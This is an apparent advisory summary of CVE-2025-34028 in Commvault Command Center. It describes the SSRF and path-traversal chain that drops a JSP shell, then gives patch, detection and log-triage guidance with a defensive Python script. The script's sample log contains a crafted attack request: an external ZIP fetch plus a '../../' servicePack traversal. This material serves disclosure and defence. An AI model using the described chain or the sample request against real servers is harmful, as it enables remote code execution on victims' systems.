Full Report
A critical security flaw has been disclosed in the Commvault Command Center that could allow arbitrary code execution on affected installations. The vulnerability, tracked as CVE-2025-34028, carries a CVSS score of 9.0 out of a maximum of 10.0. "A critical security vulnerability has been identified in the Command Center installation, allowing remote attackers to execute arbitrary code without
Analysis Summary
# Vulnerability: Critical Pre-Authenticated Remote Code Execution in Commvault Command Center
## CVE Details
- CVE ID: CVE-2025-34028
- CVSS Score: 9.0 (Critical)
- CWE: Not explicitly mentioned in the source material; the described behaviour (unauthenticated SSRF plus path traversal leading to RCE) is indicative of Improper Access Control.
## Affected Systems
- Products: Commvault Command Center
- Versions: 11.38.0 through 11.38.19 (Innovation Release)
- Configurations: Any installation running the affected versions of the Command Center.
## Vulnerability Description
A critical vulnerability exists in the Commvault Command Center, allowing remote attackers to achieve fully pre-authenticated Remote Code Execution (RCE). The flaw is rooted in the `/commandcenter/deployWebpackage.do` endpoint, which suffers from an unauthenticated Server-Side Request Forgery (SSRF) due to a lack of filtering on destination hosts. An attacker can exploit this SSRF by uploading a specially crafted ZIP archive containing a malicious `.JSP` file. The process involves:
1. Sending an HTTP request to `/commandcenter/deployWebpackage.do` pointing to an external server hosting the malicious ZIP.
2. The system unzips the contents to a temporary directory (`.tmp`).
3. Using the `servicePack` parameter, the attacker forces directory traversal to place the file into a publicly accessible directory (e.g., `../../Reports/MetricsUpload/shell`).
4. A subsequent request to execute the JSP file results in RCE on the server.
## Exploitation
- Status: PoC available (Researcher report confirms successful exploitation path)
- Complexity: Low (Pre-authenticated RCE achievable via crafted HTTP requests)
- Attack Vector: Network (Remote)
## Impact
- Confidentiality: High (Potential full access to the system/environment)
- Integrity: High (Ability to modify system files and state)
- Availability: High (Potential for system denial or compromise)
## Remediation
### Patches
- **Fixed Versions:**
  - 11.38.20
  - 11.38.25
### Workarounds
- No specific workarounds were detailed in the provided text; immediate patching is strongly advised given the critical severity and the pre-authenticated RCE. If patching must be delayed, restricting network access to the Command Center interface should be considered as an interim measure.
## Detection
- **Indicators of Compromise:** Unusual file creation or execution within temporary directories or under the `/Reports/MetricsUpload/` path, in particular `.jsp` files and the requests that created or invoked them.
- **Detection methods and tools:** watchTowr Labs provided a **Detection Artefact Generator** tool, which organizations can use immediately to check whether their instance is vulnerable. Monitoring traffic to the `/commandcenter/deployWebpackage.do` endpoint for suspicious parameter values (path traversal in `servicePack`, references to external hosts) is also recommended.
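As an added defender-side example (not part of the vendor advisory, the researcher report, or watchTowr's detection tool), the Python below does two things the summary above calls for: it checks a Command Center version string against the affected range 11.38.0 through 11.38.19, and it triages access-log lines for the endpoint and parameter behaviour described in the vulnerability description and detection sections. It assumes a Common Log Format access log (the real Command Center log layout may differ and the regex would need adjusting); the sample log lines are constructed, the benign request paths are placeholders, and `packageUrl` is a placeholder parameter name since the report does not name the parameter carrying the external ZIP location.

```python
"""Access-log triage and version check for CVE-2025-34028 (Commvault Command Center).

Added example, not tooling from the advisory or from watchTowr Labs. It assumes
a Common Log Format style access log; the real Command Center log layout may
differ and LOG_RE would need adjusting.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and drop path named in the report (compared case-insensitively).
TARGET_ENDPOINT = "/commandcenter/deploywebpackage.do"
UPLOAD_PATH = "/reports/metricsupload/"
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
EXTERNAL_URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Common Log Format: src ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Affected range as listed in the advisory summary (11.38.0 .. 11.38.19).
AFFECTED_MIN = (11, 38, 0)
AFFECTED_MAX = (11, 38, 19)


def parse_version(version: str) -> tuple:
    """'11.38.20' -> (11, 38, 20); missing components are treated as 0."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return (parts + (0, 0, 0))[:3]


def is_affected(version: str) -> bool:
    """True when the version lies inside the affected range.

    Assumption: a plain numeric comparison of the dotted version is enough;
    hotfix-pack numbering is not considered.
    """
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def classify_request(line: str):
    """Return an alert dict for one access-log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    findings = []

    if path == TARGET_ENDPOINT:
        # Any hit on the vulnerable endpoint deserves review on an unpatched host.
        findings.append("request to deployWebpackage.do")
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = unquote(value)  # second decode catches double-encoded traversal
            if key.lower() == "servicepack" and TRAVERSAL_RE.search(decoded):
                findings.append(f"path traversal in servicePack: {decoded}")
            if EXTERNAL_URL_RE.match(decoded):
                findings.append(f"external URL in parameter {key}: {decoded}")

    if UPLOAD_PATH in path and path.endswith(".jsp"):
        # A JSP served from the reports upload path matches the post-drop step.
        findings.append(f"JSP served from MetricsUpload path: {parts.path}")

    if not findings:
        return None
    return {"src": m.group("src"), "ts": m.group("ts"),
            "status": m.group("status"), "findings": findings}


def scan_access_log(text: str) -> list:
    """Run classify_request over every line and return the alerts in order."""
    alerts = []
    for line in text.splitlines():
        alert = classify_request(line)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample log (not real traffic); 203.0.113.0/24 is documentation space.
# The benign paths are placeholders, and "packageUrl" is a placeholder name: the
# report does not name the parameter that carries the external ZIP location.
SAMPLE_LOG = """\
10.0.0.12 - - [24/Apr/2025:10:01:02 +0000] "GET /commandcenter/login.do HTTP/1.1" 200 512
203.0.113.7 - - [24/Apr/2025:10:02:15 +0000] "POST /commandcenter/deployWebpackage.do?packageUrl=http%3A%2F%2F203.0.113.9%2Fpkg.zip&servicePack=..%2F..%2FReports%2FMetricsUpload%2Fshell HTTP/1.1" 200 0
203.0.113.7 - - [24/Apr/2025:10:02:19 +0000] "GET /Reports/MetricsUpload/shell/x.jsp HTTP/1.1" 200 77
10.0.0.12 - - [24/Apr/2025:10:03:00 +0000] "GET /commandcenter/dashboard.do HTTP/1.1" 200 8812
"""

if __name__ == "__main__":
    for v in ("11.38.0", "11.38.19", "11.38.20", "11.38.25"):
        print(v, "affected" if is_affected(v) else "not in affected range")
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert["ts"], alert["src"], "->", "; ".join(alert["findings"]))
```

Run against a real access log, the two flagged lines above show the pattern a responder wants to correlate: a deploy request with traversal in `servicePack` from an external address, followed seconds later by the same address fetching a `.jsp` from under `/Reports/MetricsUpload/`. A single hit on the endpoint with clean parameters is low signal on its own; the traversal or the follow-up JSP request is what should page someone.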
## References
- Vendor Advisory: https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html
- Researcher Report: https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028
- Detection Tool: https://github.com/watchtowrlabs/watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028